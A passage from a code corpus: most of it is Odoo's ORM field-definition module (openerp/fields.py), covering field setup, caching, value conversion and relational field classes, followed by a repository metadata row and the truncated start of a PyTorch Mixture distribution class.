if other:
other[self.related[-1]] = record[self.name]
def _search_related(self, records, operator, value):
""" Determine the domain to search on field `self`. """
return [('.'.join(self.related), operator, value)]
# properties used by _setup_related() to copy values from related field
_related_comodel_name = property(attrgetter('comodel_name'))
_related_string = property(attrgetter('string'))
_related_help = property(attrgetter('help'))
_related_readonly = property(attrgetter('readonly'))
_related_groups = property(attrgetter('groups'))
@property
def base_field(self):
""" Return the base field of an inherited field, or `self`. """
return self.related_field if self.inherited else self
#
# Setup of non-related fields
#
def _setup_regular(self, env):
""" Setup the attributes of a non-related field. """
recs = env[self.model_name]
def make_depends(deps):
return tuple(deps(recs) if callable(deps) else deps)
# convert compute into a callable and determine depends
if isinstance(self.compute, basestring):
# if the compute method has been overridden, concatenate all their _depends
self.depends = ()
for method in resolve_all_mro(type(recs), self.compute, reverse=True):
self.depends += make_depends(getattr(method, '_depends', ()))
self.compute = getattr(type(recs), self.compute)
else:
self.depends = make_depends(getattr(self.compute, '_depends', ()))
# convert inverse and search into callables
if isinstance(self.inverse, basestring):
self.inverse = getattr(type(recs), self.inverse)
if isinstance(self.search, basestring):
self.search = getattr(type(recs), self.search)
def _setup_dependency(self, path0, model, path1):
""" Make `self` depend on `model`; `path0 + path1` is a dependency of
`self`, and `path0` is the sequence of field names from `self.model`
to `model`.
"""
env = model.env
head, tail = path1[0], path1[1:]
model._setup_fields()
if head == '*':
# special case: add triggers on all fields of model (except self)
fields = set(model._fields.itervalues()) - set([self])
else:
fields = [model._fields[head]]
for field in fields:
if field == self:
_logger.debug("Field %s is recursively defined", self)
self.recursive = True
continue
field.setup(env)
#_logger.debug("Add trigger on %s to recompute %s", field, self)
field._triggers.add((self, '.'.join(path0 or ['id'])))
# add trigger on inverse fields, too
for invf in field.inverse_fields:
#_logger.debug("Add trigger on %s to recompute %s", invf, self)
invf._triggers.add((self, '.'.join(path0 + [head])))
# recursively traverse the dependency
if tail:
comodel = env[field.comodel_name]
self._setup_dependency(path0 + [head], comodel, tail)
@property
def dependents(self):
""" Return the computed fields that depend on `self`. """
return (field for field, path in self._triggers)
############################################################################
#
# Field description
#
def get_description(self, env):
""" Return a dictionary that describes the field `self`. """
desc = {'type': self.type}
for attr, prop in self.description_attrs:
value = getattr(self, prop)
if callable(value):
value = value(env)
if value is not None:
desc[attr] = value
return desc
# properties used by get_description()
_description_store = property(attrgetter('store'))
_description_manual = property(attrgetter('manual'))
_description_depends = property(attrgetter('depends'))
_description_related = property(attrgetter('related'))
_description_company_dependent = property(attrgetter('company_dependent'))
_description_readonly = property(attrgetter('readonly'))
_description_required = property(attrgetter('required'))
_description_states = property(attrgetter('states'))
_description_groups = property(attrgetter('groups'))
_description_change_default = property(attrgetter('change_default'))
_description_deprecated = property(attrgetter('deprecated'))
@property
def _description_searchable(self):
return bool(self.store or self.search or (self.column and self.column._fnct_search))
@property
def _description_sortable(self):
return self.store or (self.inherited and self.related_field._description_sortable)
def _description_string(self, env):
if self.string and env.lang:
field = self.base_field
name = "%s,%s" % (field.model_name, field.name)
trans = env['ir.translation']._get_source(name, 'field', env.lang)
return trans or self.string
return self.string
def _description_help(self, env):
if self.help and env.lang:
name = "%s,%s" % (self.model_name, self.name)
trans = env['ir.translation']._get_source(name, 'help', env.lang)
return trans or self.help
return self.help
############################################################################
#
# Conversion to column instance
#
def to_column(self):
""" return a low-level field object corresponding to `self` """
assert self.store or self.column
# determine column parameters
_logger.debug("Create fields._column for Field %s", self)
args = {}
for attr, prop in self.column_attrs:
args[attr] = getattr(self, prop)
for attr in self._free_attrs:
args[attr] = getattr(self, attr)
if self.company_dependent:
# company-dependent fields are mapped to former property fields
args['type'] = self.type
args['relation'] = self.comodel_name
self.column = fields.property(**args)
elif self.column:
# let the column provide a valid column for the given parameters
self.column = self.column.new(**args)
else:
# create a fresh new column of the right type
self.column = getattr(fields, self.type)(**args)
return self.column
# properties used by to_column() to create a column instance
_column_copy = property(attrgetter('copy'))
_column_select = property(attrgetter('index'))
_column_manual = property(attrgetter('manual'))
_column_string = property(attrgetter('string'))
_column_help = property(attrgetter('help'))
_column_readonly = property(attrgetter('readonly'))
_column_required = property(attrgetter('required'))
_column_states = property(attrgetter('states'))
_column_groups = property(attrgetter('groups'))
_column_change_default = property(attrgetter('change_default'))
_column_deprecated = property(attrgetter('deprecated'))
############################################################################
#
# Conversion of values
#
def null(self, env):
""" return the null value for this field in the given environment """
return False
def convert_to_cache(self, value, record, validate=True):
""" convert `value` to the cache level in `env`; `value` may come from
an assignment, or have the format of methods :meth:`BaseModel.read`
or :meth:`BaseModel.write`
:param record: the target record for the assignment, or an empty recordset
:param bool validate: when True, field-specific validation of
`value` will be performed
"""
return value
def convert_to_read(self, value, use_name_get=True):
""" convert `value` from the cache to a value as returned by method
:meth:`BaseModel.read`
:param bool use_name_get: when True, value's diplay name will
be computed using :meth:`BaseModel.name_get`, if relevant
for the field
"""
return False if value is None else value
def convert_to_write(self, value, target=None, fnames=None):
""" convert `value` from the cache to a valid value for method
:meth:`BaseModel.write`.
:param target: optional, the record to be modified with this value
:param fnames: for relational fields only, an optional collection of
field names to convert
"""
return self.convert_to_read(value)
def convert_to_onchange(self, value):
""" convert `value` from the cache to a valid value for an onchange
method v7.
"""
return self.convert_to_write(value)
def convert_to_export(self, value, env):
""" convert `value` from the cache to a valid value for export. The
parameter `env` is given for managing translations.
"""
if env.context.get('export_raw_data'):
return value
return bool(value) and ustr(value)
def convert_to_display_name(self, value):
""" convert `value` from the cache to a suitable display name. """
return ustr(value)
############################################################################
#
# Descriptor methods
#
def __get__(self, record, owner):
""" return the value of field `self` on `record` """
if record is None:
return self # the field is accessed through the owner class
if not record:
# null record -> return the null value for this field
return self.null(record.env)
# only a single record may be accessed
record.ensure_one()
try:
return record._cache[self]
except KeyError:
pass
# cache miss, retrieve value
if record.id:
# normal record -> read or compute value for this field
self.determine_value(record)
else:
# draft record -> compute the value or let it be null
self.determine_draft_value(record)
# the result should be in cache now
return record._cache[self]
def __set__(self, record, value):
""" set the value of field `self` on `record` """
env = record.env
# only a single record may be updated
record.ensure_one()
# adapt value to the cache level
value = self.convert_to_cache(value, record)
if env.in_draft or not record.id:
# determine dependent fields
spec = self.modified_draft(record)
# set value in cache, inverse field, and mark record as dirty
record._cache[self] = value
if env.in_onchange:
for invf in self.inverse_fields:
invf._update(value, record)
record._set_dirty(self.name)
# determine more dependent fields, and invalidate them
if self.relational:
spec += self.modified_draft(record)
env.invalidate(spec)
else:
# simply write to the database, and update cache
record.write({self.name: self.convert_to_write(value)})
record._cache[self] = value
############################################################################
#
# Computation of field values
#
def _compute_value(self, records):
""" Invoke the compute method on `records`. """
# initialize the fields to their corresponding null value in cache
for field in self.computed_fields:
records._cache[field] = field.null(records.env)
records.env.computed[field].update(records._ids)
self.compute(records)
for field in self.computed_fields:
records.env.computed[field].difference_update(records._ids)
def compute_value(self, records):
""" Invoke the compute method on `records`; the results are in cache. """
with records.env.do_in_draft():
try:
self._compute_value(records)
except (AccessError, MissingError):
# some record is forbidden or missing, retry record by record
for record in records:
try:
self._compute_value(record)
except Exception as exc:
record._cache[self.name] = FailedValue(exc)
def determine_value(self, record):
""" Determine the value of `self` for `record`. """
env = record.env
if self.column and not (self.depends and env.in_draft):
# this is a stored field or an old-style function field
if self.depends:
# this is a stored computed field, check for recomputation
recs = record._recompute_check(self)
if recs:
# recompute the value (only in cache)
self.compute_value(recs)
# HACK: if result is in the wrong cache, copy values
if recs.env != env:
for source, target in zip(recs, recs.with_env(env)):
try:
values = target._convert_to_cache({
f.name: source[f.name] for f in self.computed_fields
}, validate=False)
except MissingError as e:
values = FailedValue(e)
target._cache.update(values)
# the result is saved to database by BaseModel.recompute()
return
# read the field from database
record._prefetch_field(self)
elif self.compute:
# this is either a non-stored computed field, or a stored computed
# field in draft mode
if self.recursive:
self.compute_value(record)
else:
recs = record._in_cache_without(self)
self.compute_value(recs)
else:
# this is a non-stored non-computed field
record._cache[self] = self.null(env)
def determine_draft_value(self, record):
""" Determine the value of `self` for the given draft `record`. """
if self.compute:
self._compute_value(record)
else:
record._cache[self] = SpecialValue(self.null(record.env))
def determine_inverse(self, records):
""" Given the value of `self` on `records`, inverse the computation. """
if self.inverse:
self.inverse(records)
def determine_domain(self, records, operator, value):
""" Return a domain representing a condition on `self`. """
if self.search:
return self.search(records, operator, value)
else:
return [(self.name, operator, value)]
############################################################################
#
# Notification when fields are modified
#
def modified(self, records):
""" Notify that field `self` has been modified on `records`: prepare the
fields/records to recompute, and return a spec indicating what to
invalidate.
"""
# invalidate the fields that depend on self, and prepare recomputation
spec = [(self, records._ids)]
for field, path in self._triggers:
if path and field.store:
# don't move this line to function top, see log
env = records.env(user=SUPERUSER_ID, context={'active_test': False})
target = env[field.model_name].search([(path, 'in', records.ids)])
if target:
spec.append((field, target._ids))
target.with_env(records.env)._recompute_todo(field)
else:
spec.append((field, None))
return spec
def modified_draft(self, records):
""" Same as :meth:`modified`, but in draft mode. """
env = records.env
# invalidate the fields on the records in cache that depend on
# `records`, except fields currently being computed
spec = []
for field, path in self._triggers:
target = env[field.model_name]
computed = target.browse(env.computed[field])
if path == 'id':
target = records - computed
elif path:
target = (target.browse(env.cache[field]) - computed).filtered(
lambda rec: rec._mapped_cache(path) & records
)
else:
target = target.browse(env.cache[field]) - computed
if target:
spec.append((field, target._ids))
return spec
class Boolean(Field):
type = 'boolean'
def convert_to_cache(self, value, record, validate=True):
return bool(value)
def convert_to_export(self, value, env):
if env.context.get('export_raw_data'):
return value
return ustr(value)
class Integer(Field):
type = 'integer'
group_operator = None # operator for aggregating values
_related_group_operator = property(attrgetter('group_operator'))
_column_group_operator = property(attrgetter('group_operator'))
def convert_to_cache(self, value, record, validate=True):
if isinstance(value, dict):
# special case, when an integer field is used as inverse for a one2many
return value.get('id', False)
return int(value or 0)
def convert_to_read(self, value, use_name_get=True):
# Integer values greater than 2^31-1 are not supported in pure XMLRPC,
# so we have to pass them as floats :-(
if value and value > xmlrpclib.MAXINT:
return float(value)
return value
def _update(self, records, value):
# special case, when an integer field is used as inverse for a one2many
records._cache[self] = value.id or 0
class Float(Field):
""" The precision digits are given by the attribute
:param digits: a pair (total, decimal), or a function taking a database
cursor and returning a pair (total, decimal)
"""
type = 'float'
_digits = None # digits argument passed to class initializer
digits = None # digits as computed by setup()
group_operator = None # operator for aggregating values
def __init__(self, string=None, digits=None, **kwargs):
super(Float, self).__init__(string=string, _digits=digits, **kwargs)
def _setup_digits(self, env):
""" Setup the digits for `self` and its corresponding column """
self.digits = self._digits(env.cr) if callable(self._digits) else self._digits
if self.digits:
assert isinstance(self.digits, (tuple, list)) and len(self.digits) >= 2, \
"Float field %s with digits %r, expecting (total, decimal)" % (self, self.digits)
if self.column:
self.column.digits_change(env.cr)
def _setup_regular(self, env):
super(Float, self)._setup_regular(env)
self._setup_digits(env)
_related_digits = property(attrgetter('digits'))
_related_group_operator = property(attrgetter('group_operator'))
_description_digits = property(attrgetter('digits'))
_column_digits = property(lambda self: not callable(self._digits) and self._digits)
_column_digits_compute = property(lambda self: callable(self._digits) and self._digits)
_column_group_operator = property(attrgetter('group_operator'))
def convert_to_cache(self, value, record, validate=True):
# apply rounding here, otherwise value in cache may be wrong!
if self.digits:
return float_round(float(value or 0.0), precision_digits=self.digits[1])
else:
return float(value or 0.0)
class _String(Field):
""" Abstract class for string fields. """
translate = False
_column_translate = property(attrgetter('translate'))
_related_translate = property(attrgetter('translate'))
_description_translate = property(attrgetter('translate'))
class Char(_String):
""" Basic string field, can be length-limited, usually displayed as a
single-line string in clients
:param int size: the maximum size of values stored for that field
:param bool translate: whether the values of this field can be translated
"""
type = 'char'
size = None
def _setup(self, env):
super(Char, self)._setup(env)
assert isinstance(self.size, (NoneType, int)), \
"Char field %s with non-integer size %r" % (self, self.size)
_column_size = property(attrgetter('size'))
_related_size = property(attrgetter('size'))
_description_size = property(attrgetter('size'))
def convert_to_cache(self, value, record, validate=True):
if value is None or value is False:
return False
return ustr(value)[:self.size]
class Text(_String):
""" Very similar to :class:`~.Char` but used for longer contents, does not
have a size and usually displayed as a multiline text box.
:param translate: whether the value of this field can be translated
"""
type = 'text'
def convert_to_cache(self, value, record, validate=True):
if value is None or value is False:
return False
return ustr(value)
class Html(_String):
type = 'html'
sanitize = True # whether value must be sanitized
_column_sanitize = property(attrgetter('sanitize'))
_related_sanitize = property(attrgetter('sanitize'))
_description_sanitize = property(attrgetter('sanitize'))
def convert_to_cache(self, value, record, validate=True):
if value is None or value is False:
return False
if validate and self.sanitize:
return html_sanitize(value)
return value
class Date(Field):
type = 'date'
@staticmethod
def today(*args):
""" Return the current day in the format expected by the ORM.
This function may be used to compute default values.
"""
return date.today().strftime(DATE_FORMAT)
@staticmethod
def context_today(record, timestamp=None):
""" Return the current date as seen in the client's timezone in a format
fit for date fields. This method may be used to compute default
values.
:param datetime timestamp: optional datetime value to use instead of
the current date and time (must be a datetime, regular dates
can't be converted between timezones.)
:rtype: str
"""
today = timestamp or datetime.now()
context_today = None
tz_name = record._context.get('tz') or record.env.user.tz
if tz_name:
try:
today_utc = pytz.timezone('UTC').localize(today, is_dst=False) # UTC = no DST
context_today = today_utc.astimezone(pytz.timezone(tz_name))
except Exception:
_logger.debug("failed to compute context/client-specific today date, using UTC value for `today`",
exc_info=True)
return (context_today or today).strftime(DATE_FORMAT)
@staticmethod
def from_string(value):
""" Convert an ORM `value` into a :class:`date` value. """
value = value[:DATE_LENGTH]
return datetime.strptime(value, DATE_FORMAT).date()
@staticmethod
def to_string(value):
""" Convert a :class:`date` value into the format expected by the ORM. """
return value.strftime(DATE_FORMAT)
def convert_to_cache(self, value, record, validate=True):
if not value:
return False
if isinstance(value, basestring):
if validate:
# force parsing for validation
self.from_string(value)
return value[:DATE_LENGTH]
return self.to_string(value)
def convert_to_export(self, value, env):
if value and env.context.get('export_raw_data'):
return self.from_string(value)
return bool(value) and ustr(value)
class Datetime(Field):
type = 'datetime'
@staticmethod
def now(*args):
""" Return the current day and time in the format expected by the ORM.
This function may be used to compute default values.
"""
return datetime.now().strftime(DATETIME_FORMAT)
@staticmethod
def context_timestamp(record, timestamp):
"""Returns the given timestamp converted to the client's timezone.
This method is *not* meant for use as a _defaults initializer,
because datetime fields are automatically converted upon
display on client side. For _defaults you :meth:`fields.datetime.now`
should be used instead.
:param datetime timestamp: naive datetime value (expressed in UTC)
to be converted to the client timezone
:rtype: datetime
:return: timestamp converted to timezone-aware datetime in context
timezone
"""
assert isinstance(timestamp, datetime), 'Datetime instance expected'
tz_name = record._context.get('tz') or record.env.user.tz
if tz_name:
try:
utc = pytz.timezone('UTC')
context_tz = pytz.timezone(tz_name)
utc_timestamp = utc.localize(timestamp, is_dst=False) # UTC = no DST
return utc_timestamp.astimezone(context_tz)
except Exception:
_logger.debug("failed to compute context/client-specific timestamp, "
"using the UTC value",
exc_info=True)
return timestamp
@staticmethod
def from_string(value):
""" Convert an ORM `value` into a :class:`datetime` value. """
value = value[:DATETIME_LENGTH]
if len(value) == DATE_LENGTH:
value += " 00:00:00"
return datetime.strptime(value, DATETIME_FORMAT)
@staticmethod
def to_string(value):
""" Convert a :class:`datetime` value into the format expected by the ORM. """
return value.strftime(DATETIME_FORMAT)
def convert_to_cache(self, value, record, validate=True):
if not value:
return False
if isinstance(value, basestring):
if validate:
# force parsing for validation
self.from_string(value)
value = value[:DATETIME_LENGTH]
if len(value) == DATE_LENGTH:
value += " 00:00:00"
return value
return self.to_string(value)
def convert_to_export(self, value, env):
if value and env.context.get('export_raw_data'):
return self.from_string(value)
return bool(value) and ustr(value)
class Binary(Field):
type = 'binary'
class Selection(Field):
"""
:param selection: specifies the possible values for this field.
It is given as either a list of pairs (`value`, `string`), or a
model method, or a method name.
:param selection_add: provides an extension of the selection in the case
of an overridden field. It is a list of pairs (`value`, `string`).
The attribute `selection` is mandatory except in the case of
:ref:`related fields <field-related>` or :ref:`field extensions
<field-incremental-definition>`.
"""
type = 'selection'
selection = None # [(value, string), ...], function or method name
selection_add = None # [(value, string), ...]
def __init__(self, selection=None, string=None, **kwargs):
if callable(selection):
from openerp import api
selection = api.expected(api.model, selection)
super(Selection, self).__init__(selection=selection, string=string, **kwargs)
def _setup(self, env):
super(Selection, self)._setup(env)
assert self.selection is not None, "Field %s without selection" % self
def _setup_related(self, env):
super(Selection, self)._setup_related(env)
# selection must be computed on related field
field = self.related_field
self.selection = lambda model: field._description_selection(model.env)
def set_class_name(self, cls, name):
super(Selection, self).set_class_name(cls, name)
# determine selection (applying 'selection_add' extensions)
selection = None
for field in resolve_all_mro(cls, name, reverse=True):
if isinstance(field, type(self)):
# We cannot use field.selection or field.selection_add here
# because those attributes are overridden by `set_class_name`.
if 'selection' in field._attrs:
selection = field._attrs['selection']
if 'selection_add' in field._attrs:
selection = selection + field._attrs['selection_add']
else:
selection = None
self.selection = selection
def _description_selection(self, env):
""" return the selection list (pairs (value, label)); labels are
translated according to context language
"""
selection = self.selection
if isinstance(selection, basestring):
return getattr(env[self.model_name], selection)()
if callable(selection):
return selection(env[self.model_name])
# translate selection labels
if env.lang:
name = "%s,%s" % (self.model_name, self.name)
translate = partial(
env['ir.translation']._get_source, name, 'selection', env.lang)
return [(value, translate(label) if label else label) for value, label in selection]
else:
return selection
@property
def _column_selection(self):
if isinstance(self.selection, basestring):
method = self.selection
return lambda self, *a, **kw: getattr(self, method)(*a, **kw)
else:
return self.selection
def get_values(self, env):
""" return a list of the possible values """
selection = self.selection
if isinstance(selection, basestring):
selection = getattr(env[self.model_name], selection)()
elif callable(selection):
selection = selection(env[self.model_name])
return [value for value, _ in selection]
def convert_to_cache(self, value, record, validate=True):
if not validate:
return value or False
if value in self.get_values(record.env):
return value
elif not value:
return False
raise ValueError("Wrong value for %s: %r" % (self, value))
def convert_to_export(self, value, env):
if not isinstance(self.selection, list):
# FIXME: this reproduces an existing buggy behavior!
return value
for item in self._description_selection(env):
if item[0] == value:
return item[1]
return False
class Reference(Selection):
type = 'reference'
size = None
def __init__(self, selection=None, string=None, **kwargs):
super(Reference, self).__init__(selection=selection, string=string, **kwargs)
def _setup(self, env):
super(Reference, self)._setup(env)
assert isinstance(self.size, (NoneType, int)), \
"Reference field %s with non-integer size %r" % (self, self.size)
_related_size = property(attrgetter('size'))
_column_size = property(attrgetter('size'))
def convert_to_cache(self, value, record, validate=True):
if isinstance(value, BaseModel):
if ((not validate or value._name in self.get_values(record.env))
and len(value) <= 1):
return value.with_env(record.env) or False
elif isinstance(value, basestring):
res_model, res_id = value.split(',')
return record.env[res_model].browse(int(res_id))
elif not value:
return False
raise ValueError("Wrong value for %s: %r" % (self, value))
def convert_to_read(self, value, use_name_get=True):
return "%s,%s" % (value._name, value.id) if value else False
def convert_to_export(self, value, env):
return bool(value) and value.name_get()[0][1]
def convert_to_display_name(self, value):
return ustr(value and value.display_name)
class _Relational(Field):
""" Abstract class for relational fields. """
relational = True
domain = None # domain for searching values
context = None # context for searching values
def _setup(self, env):
super(_Relational, self)._setup(env)
if self.comodel_name not in env.registry:
_logger.warning("Field %s with unknown comodel_name %r"
% (self, self.comodel_name))
self.comodel_name = '_unknown'
@property
def _related_domain(self):
if callable(self.domain):
# will be called with another model than self's
return lambda recs: self.domain(recs.env[self.model_name])
else:
# maybe not correct if domain is a string...
return self.domain
_related_context = property(attrgetter('context'))
_description_relation = property(attrgetter('comodel_name'))
_description_context = property(attrgetter('context'))
def _description_domain(self, env):
return self.domain(env[self.model_name]) if callable(self.domain) else self.domain
_column_obj = property(attrgetter('comodel_name'))
_column_domain = property(attrgetter('domain'))
_column_context = property(attrgetter('context'))
def null(self, env):
return env[self.comodel_name]
def modified(self, records):
# Invalidate cache for self.inverse_fields, too. Note that recomputation
# of fields that depend on self.inverse_fields is already covered by the
# triggers (see above).
spec = super(_Relational, self).modified(records)
for invf in self.inverse_fields:
spec.append((invf, None))
return spec
class Many2one(_Relational):
""" The value of such a field is a recordset of size 0 (no
record) or 1 (a single record).
:param comodel_name: name of the target model (string)
:param domain: an optional domain to set on candidate values on the
client side (domain or string)
:param context: an optional context to use on the client side when
handling that field (dictionary)
:param ondelete: what to do when the referred record is deleted;
possible values are: ``'set null'``, ``'restrict'``, ``'cascade'``
:param auto_join: whether JOINs are generated upon search through that
field (boolean, by default ``False``)
:param delegate: set it to ``True`` to make fields of the target model
accessible from the current model (corresponds to ``_inherits``)
The attribute `comodel_name` is mandatory except in the case of related
fields or field extensions.
"""
type = 'many2one'
ondelete = 'set null' # what to do when value is deleted
auto_join = False # whether joins are generated upon search
delegate = False # whether self implements delegation
def __init__(self, comodel_name=None, string=None, **kwargs):
super(Many2one, self).__init__(comodel_name=comodel_name, string=string, **kwargs)
def set_class_name(self, cls, name):
super(Many2one, self).set_class_name(cls, name)
# determine self.delegate
if not self.delegate:
self.delegate = name in cls._inherits.values()
_column_ondelete = property(attrgetter('ondelete'))
_column_auto_join = property(attrgetter('auto_join'))
def _update(self, records, value):
""" Update the cached value of `self` for `records` with `value`. """
records._cache[self] = value
def convert_to_cache(self, value, record, validate=True):
if isinstance(value, (NoneType, int, long)):
return record.env[self.comodel_name].browse(value)
if isinstance(value, BaseModel):
if value._name == self.comodel_name and len(value) <= 1:
return value.with_env(record.env)
raise ValueError("Wrong value for %s: %r" % (self, value))
elif isinstance(value, tuple):
return record.env[self.comodel_name].browse(value[0])
elif isinstance(value, dict):
return record.env[self.comodel_name].new(value)
else:
return self.null(record.env)
def convert_to_read(self, value, use_name_get=True):
if use_name_get and value:
# evaluate name_get() as superuser, because the visibility of a
# many2one field value (id and name) depends on the current record's
# access rights, and not the value's access rights.
try:
return value.sudo().name_get()[0]
except MissingError:
# Should not happen, unless the foreign key is missing.
return False
else:
return value.id
def convert_to_write(self, value, target=None, fnames=None):
return value.id
def convert_to_onchange(self, value):
return value.id
def convert_to_export(self, value, env):
return bool(value) and value.name_get()[0][1]
def convert_to_display_name(self, value):
return ustr(value.display_name)
class UnionUpdate(SpecialValue):
""" Placeholder for a value update; when this value is taken from the cache,
it returns ``record[field.name] | value`` and stores it in the cache.
"""
def __init__(self, field, record, value):
self.args = (field, record, value)
def get(self):
field, record, value = self.args
# in order to read the current field's value, remove self from cache
del record._cache[field]
# read the current field's value, and update it in cache only
record._cache[field] = new_value = record[field.name] | value
return new_value
class _RelationalMulti(_Relational):
""" Abstract class for relational fields *2many. """
def _update(self, records, value):
""" Update the cached value of `self` for `records` with `value`. """
for record in records:
if self in record._cache:
record._cache[self] = record[self.name] | value
else:
record._cache[self] = UnionUpdate(self, record, value)
def convert_to_cache(self, value, record, validate=True):
if isinstance(value, BaseModel):
if value._name == self.comodel_name:
return value.with_env(record.env)
elif isinstance(value, list):
# value is a list of record ids or commands
if not record.id:
record = record.browse() # new record has no value
result = record[self.name]
# modify result with the commands;
# beware to not introduce duplicates in result
for command in value:
if isinstance(command, (tuple, list)):
if command[0] == 0:
result += result.new(command[2])
elif command[0] == 1:
result.browse(command[1]).update(command[2])
result += result.browse(command[1]) - result
elif command[0] == 2:
# note: the record will be deleted by write()
result -= result.browse(command[1])
elif command[0] == 3:
result -= result.browse(command[1])
elif command[0] == 4:
result += result.browse(command[1]) - result
elif command[0] == 5:
result = result.browse()
elif command[0] == 6:
result = result.browse(command[2])
elif isinstance(command, dict):
result += result.new(command)
else:
result += result.browse(command) - result
return result
elif not value:
return self.null(record.env)
raise ValueError("Wrong value for %s: %s" % (self, value))
def convert_to_read(self, value, use_name_get=True):
return value.ids
def convert_to_write(self, value, target=None, fnames=None):
# remove/delete former records
if target is None:
set_ids = []
result = [(6, 0, set_ids)]
add_existing = lambda id: set_ids.append(id)
else:
tag = 2 if self.type == 'one2many' else 3
result = [(tag, record.id) for record in target[self.name] - value]
add_existing = lambda id: result.append((4, id))
if fnames is None:
# take all fields in cache, except the inverses of self
fnames = set(value._fields) - set(MAGIC_COLUMNS)
for invf in self.inverse_fields:
fnames.discard(invf.name)
# add new and existing records
for record in value:
if not record.id:
values = {k: v for k, v in record._cache.iteritems() if k in fnames}
values = record._convert_to_write(values)
result.append((0, 0, values))
elif record._is_dirty():
values = {k: record._cache[k] for k in record._get_dirty() if k in fnames}
values = record._convert_to_write(values)
result.append((1, record.id, values))
else:
add_existing(record.id)
return result
def convert_to_export(self, value, env):
return bool(value) and ','.join(name for id, name in value.name_get())
def convert_to_display_name(self, value):
raise NotImplementedError()
def _compute_related(self, records):
""" Compute the related field `self` on `records`. """
for record in records:
value = record
# traverse the intermediate fields, and keep at most one record
for name in self.related[:-1]:
value = value[name][:1]
record[self.name] = value[self.related[-1]]
class One2many(_RelationalMulti):
""" One2many field; the value of such a field is the recordset of all the
records in `comodel_name` such that the field `inverse_name` is equal to
the current record.
:param comodel_name: name of the target model (string)
:param inverse_name: name of the inverse `Many2one` field in
`comodel_name` (string)
:param domain: an optional domain to set on candidate values on the
client side (domain or string)
:param context: an optional context to use on the client side when
handling that field (dictionary)
:param auto_join: whether JOINs are generated upon search through that
field (boolean, by default ``False``)
:param limit: optional limit to use upon read (integer)
The attributes `comodel_name` and `inverse_name` are mandatory except in
the case of related fields or field extensions.
"""
type = 'one2many'
inverse_name = None # name of the inverse field
auto_join = False # whether joins are generated upon search
limit = None # optional limit to use upon read
copy = False # o2m are not copied by default
def __init__(self, comodel_name=None, inverse_name=None, string=None, **kwargs):
super(One2many, self).__init__(
comodel_name=comodel_name,
inverse_name=inverse_name,
string=string,
**kwargs
)
def _setup_regular(self, env):
super(One2many, self)._setup_regular(env)
if self.inverse_name:
# link self to its inverse field and vice-versa
comodel = env[self.comodel_name]
comodel._setup_fields()
invf = comodel._fields[self.inverse_name]
# In some rare cases, a `One2many` field can link to `Int` field
# (res_model/res_id pattern). Only inverse the field if this is
# a `Many2one` field.
if isinstance(invf, Many2one):
self.inverse_fields.append(invf)
invf.inverse_fields.append(self)
_description_relation_field = property(attrgetter('inverse_name'))
_column_fields_id = property(attrgetter('inverse_name'))
_column_auto_join = property(attrgetter('auto_join'))
_column_limit = property(attrgetter('limit'))
class Many2many(_RelationalMulti):
""" Many2many field; the value of such a field is the recordset.
:param comodel_name: name of the target model (string)
The attribute `comodel_name` is mandatory except in the case of related
fields or field extensions.
:param relation: optional name of the table that stores the relation in
the database (string)
:param column1: optional name of the column referring to "these" records
in the table `relation` (string)
:param column2: optional name of the column referring to "those" records
in the table `relation` (string)
The attributes `relation`, `column1` and `column2` are optional. If not
given, names are automatically generated from model names, provided
`model_name` and `comodel_name` are different!
:param domain: an optional domain to set on candidate values on the
client side (domain or string)
:param context: an optional context to use on the client side when
handling that field (dictionary)
:param limit: optional limit to use upon read (integer)
"""
type = 'many2many'
relation = None # name of table
column1 = None # column of table referring to model
column2 = None # column of table referring to comodel
limit = None # optional limit to use upon read
def __init__(self, comodel_name=None, relation=None, column1=None, column2=None,
string=None, **kwargs):
super(Many2many, self).__init__(
comodel_name=comodel_name,
relation=relation,
column1=column1,
column2=column2,
string=string,
**kwargs
)
def _setup_regular(self, env):
super(Many2many, self)._setup_regular(env)
if not self.relation:
if isinstance(self.column, fields.many2many):
self.relation, self.column1, self.column2 = \
self.column._sql_names(env[self.model_name])
if self.relation:
m2m = env.registry._m2m
# if inverse field has already been setup, it is present in m2m
invf = m2m.get((self.relation, self.column2, self.column1))
if invf:
self.inverse_fields.append(invf)
invf.inverse_fields.append(self)
else:
# add self in m2m, so that its inverse field can find it
m2m[(self.relation, self.column1, self.column2)] = self
_column_rel = property(attrgetter('relation'))
_column_id1 = property(attrgetter('column1'))
_column_id2 = property(attrgetter('column2'))
_column_limit = property(attrgetter('limit'))
class Id(Field):
""" Special case for field 'id'. """
store = True
#: Can't write this!
readonly = True
def __init__(self, string=None, **kwargs):
super(Id, self).__init__(type='integer', string=string, **kwargs)
def to_column(self):
self.column = fields.integer('ID')
return self.column
def __get__(self, record, owner):
if record is None:
return self # the field is accessed through the class owner
if not record:
return False
return record.ensure_one()._ids[0]
def __set__(self, record, value):
raise TypeError("field 'id' cannot be assigned")
# imported here to avoid dependency cycle issues
from openerp import SUPERUSER_ID
from .exceptions import Warning, AccessError, MissingError
from .models import BaseModel, MAGIC_COLUMNS
from .osv import fields
| Codefans-fan/odoo | openerp/fields.py | Python | agpl-3.0 | 70,820 | 0.001525 |
import torch
from . import Distribution, Categorical
from .. import util
class Mixture(Distribution):
def __init__(self, distributions, probs=None):
self._distributions = distributions
self.length = len(distributions)
if probs is None:
self._probs = util.to_tensor(torch.zeros(self.length)).fill_(1./self.length)
else:
self._probs = util.to_tensor(probs)
self._probs = self._probs / self._probs.sum(-1, keepdim=True)
self._log_probs = torch.log(util.clamp_probs(self._probs))
event_shape = torch.Size()
if self._probs.dim() == 1:
batch_shape = torch.Size()
self._batch_length = 0
elif self._probs.dim() == 2:
batch_shape = torch.Size([self._probs.size(0)])
self._batch_length = self._probs.size(0)
else:
raise ValueError('Expecting a 1d or 2d (batched) mixture probabilities.')
self._mixing_dist = Categorical(self._probs)
self._mean = None
self._variance = None
super().__init__(name='Mixture', address_suffix='Mixture({})'.format(', '.join([d._address_suffix for d in self._distributions])), batch_shape=batch_shape, event_shape=event_shape)
def __repr__(self):
return 'Mixture(distributions:({}), probs:{})'.format(', '.join([repr(d) for d in self._distributions]), self._probs)
def __len__(self):
return self.length
def log_prob(self, value, sum=False):
if self._batch_length == 0:
value = util.to_tensor(value).squeeze()
lp = torch.logsumexp(self._log_probs + util.to_tensor([d.log_prob(value) for d in self._distributions]), dim=0)
else:
value = util.to_tensor(value).view(self._batch_length)
lp = torch.logsumexp(self._log_probs + torch.stack([d.log_prob(value).squeeze(-1) for d in self._distributions]).view(-1, self._batch_length).t(), dim=1)
return torch.sum(lp) if sum else lp
def sample(self):
if self._batch_length == 0:
